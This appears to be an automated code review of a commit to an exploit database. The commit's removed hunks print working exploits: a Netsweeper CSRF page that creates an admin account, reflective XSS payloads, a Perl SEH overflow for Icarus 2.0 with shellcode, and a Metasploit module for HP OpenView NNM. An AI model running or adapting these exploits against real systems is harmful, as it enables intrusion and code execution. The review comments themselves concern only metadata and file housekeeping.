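Review bot: Unlike the OpenLDAP, CUPS, NSS and mod_perl files, which are deleted here and re-added into a sibling file, this `com_actions` SQL injection record is removed without a counterpart anywhere in the visible hunks, so its only technical content (`index.php?option=com_actions&actionid=` and the column-count probe) disappears from the database. If it duplicates an existing entry, the commit message should say which one so the removal can be checked.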
@ -1,68 +0,0 @@
|
|||
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and "The later"
|
||||
# Date: Discovered and reported CSRF and XSS reported 4/2012 and "The later" reported 7/2012
|
||||
# Author: Jacob Holcomb/Gimppy042
|
||||
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)
|
||||
# CVE : CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and CVE-2012-3859 for the "The later"
|
||||
|
||||
*NOTE:
|
||||
# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.
|
||||
|
||||
|
||||
|
||||
CSRF Exploitation:
|
||||
In the following example we use CSRF to forge a HTTP POST request that will create an administrator account. The user must be logged in for CSRF to work. Exploitation of a non-administrative users (Sys op) account results in creation of a standard user account.
|
||||
|
||||
<head>
|
||||
<title>CSRF Create Admin - Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
|
||||
<form name="pwnd" action="http://server.domain_name/webadmin/accountmgr/adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
|
||||
<input type="hidden" name="userid" value="netsweeperPWND" />
|
||||
<input type="hidden" name="firstname" value="Jacob" />
|
||||
<input type="hidden" name="lastname" value="Holcomb" />
|
||||
<input type="hidden" name="email" value="pwnd@pwnd.com" />
|
||||
<input type="hidden" name="organization" value="yep_PWND" />
|
||||
<input type="hidden" name="description" value="PWND" />
|
||||
<input type="hidden" name="pass1" value="Pwnd-321" />
|
||||
<input type="hidden" name="pass2" value="Pwnd-321" />
|
||||
<input type="hidden" name="classification" value="admin" />
|
||||
<input type="hidden" name="expire" value="" />
|
||||
<input type="hidden" name="accounttheme" value="" />
|
||||
<input type="hidden" name="accountpmtheme" value="gpmtheme" />
|
||||
|
||||
<script>
|
||||
document.pwnd.submit();
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
XSS Exploitation:
|
||||
|
||||
The following POC code exploits a reflective XSS vulnerability using the HTTP POST method.
|
||||
|
||||
<head>
|
||||
<title>Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
|
||||
<form name="pwnd" action="http:// server.domain_name
|
||||
/webadmin/tools/local_lookup.php?action=lookup" method="post">
|
||||
<input type="hidden" name="user" value="pwnd" />
|
||||
<input type="hidden" name="group" value="><script>alert('XSS')</script>" />
|
||||
<input type="hidden" name="policy" value="pwnd" />
|
||||
<input type="hidden" name="url" value="pwnd" />
|
||||
|
||||
<script>
|
||||
document.getElementById('pwnd').submit();
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
"The later" Exploitation:
|
||||
|
||||
Coming soon... : )
|
|
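Review bot: Deleting this file drops the only record in this commit of CVE-2012-2446, CVE-2012-2447 and CVE-2012-3859 (the `# CVE :` header line), and nothing in the visible hunks re-adds it. If the removal is because the "The later" section never received its promised addendum (`Coming soon... : )`) or because the entry is a duplicate, the commit message should say so, since the CVE ids are the most likely search key for this entry.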
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/16794/
|
||||
source: http://www.securityfocus.com/bid/16794/info
|
||||
|
||||
Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/27830/
|
||||
source: http://www.securityfocus.com/bid/27830/info
|
||||
|
||||
The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/34383/info
|
||||
|
||||
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
|
@ -1,39 +0,0 @@
|
|||
#!/user/bin/perl
|
||||
#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
|
||||
#tested on win SP2
|
||||
#Author: germaya_x & D3v!LFUCK3R
|
||||
#Download :http://www.randomsoftware.com/pub/icarus.exe
|
||||
#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)
|
||||
#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)
|
||||
#############################################################
|
||||
my $bof="A" x 332 ;
|
||||
my $NEXT_sEh="\xEB\x06\x90\x90";
|
||||
my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
|
||||
my $nop="\x90" x 20;
|
||||
my $sec=
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
|
||||
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
|
||||
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
|
||||
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
|
||||
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
|
||||
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
|
||||
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
|
||||
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
|
||||
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
|
||||
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
|
||||
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
|
||||
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
|
||||
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
|
||||
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
|
||||
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
|
||||
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
|
||||
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
|
||||
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
|
||||
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
|
||||
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
|
||||
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
|
||||
"\x4e\x56\x43\x46\x42\x30\x5a";
|
||||
###################################################################
|
||||
open(myfile,'>> exploit.pgn');
|
||||
print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;
|
||||
###################################################################
|
|
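Review bot: the removed Icarus 2.0 script has a broken shebang, `#!/user/bin/perl` instead of `/usr/bin/perl`, so the file as stored would never have run directly; `open(myfile,'>> exploit.pgn')` also uses append mode and never checks the open, so repeated runs would grow the output file rather than overwrite it. None of that needs fixing in a deletion, but the commit should state whether the entry is retired because of these defects or merely relocated.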
@ -1,6 +1,5 @@
|
|||
source:
|
||||
http://www.ragestorm.net/blogs/?p=255
|
||||
http://secunia.com/advisories/40870/
|
||||
source: http://www.ragestorm.net/blogs/?p=255
|
||||
source: http://secunia.com/advisories/40870/
|
||||
|
||||
|
||||
DEVMODE dm = {0};
|
||||
|
|
|
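Review bot: splitting the reference into two `source: ...` lines matches the one-line form used by the other entries, but the hunk starts at line 1 of the file and the new `source:` lines still sit directly above `DEVMODE dm = {0};` without any `/* ... */` or `//` marker, so the file remains a C source that does not compile as stored. Either wrap the header lines in a comment or keep the references in a separate description file, as the other entries in this commit do.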
@ -1,74 +0,0 @@
|
|||
##
|
||||
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
|
||||
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
|
||||
arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 13192 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-0067' ],
|
||||
[ 'OSVDB', '53222' ],
|
||||
[ 'BID', '33147' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 650,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 7 2009'))
|
||||
|
||||
register_options( [ Opt::RPORT(80) ], self.class )
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
send_request_raw({
|
||||
'uri' => "/OvCgi/Toolbar.exe?" + sploit,
|
||||
'method' => "GET",
|
||||
}, 5)
|
||||
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
|
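Review bot: deleting `hp_nnm_toolbar_01.rb` drops the CVE-2008-0067 / OSVDB 53222 / BID 33147 reference triple and the disclosure date ('Jan 7 2009') from this DB for the HP OpenView NNM Toolbar.exe entry; nothing in the hunk says whether the module now lives in the Metasploit tree or was withdrawn. Please record the reason in the commit message. Minor, and moot for a deletion: the module still carries the SVN keyword `'Version' => '$Revision: 13192 $'` and the legacy `register_options( [ Opt::RPORT(80) ], self.class )` form, both of which later Metasploit style removed.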
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/2167/exploit
|
||||
source: http://www.securityfocus.com/bid/2167/info
|
||||
|
||||
Windows Media Player is an application used for digital audio, and video content viewing. It can be embedded in webpages as an ActiveX control.
|
||||
|
||||
|
|
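Review bot: changing `source: http://www.securityfocus.com/bid/2167/exploit` to `.../bid/2167/info` brings this entry in line with the `/info` references used elsewhere in the commit, but the two SecurityFocus pages are not equivalent: `/info` is the advisory overview, `/exploit` is the page that carried the PoC. If the PoC text below the description is retained in this file the change is fine; otherwise keep both URLs. The unchanged context line also has a stray comma in "digital audio, and video content viewing" that could be dropped in a follow-up.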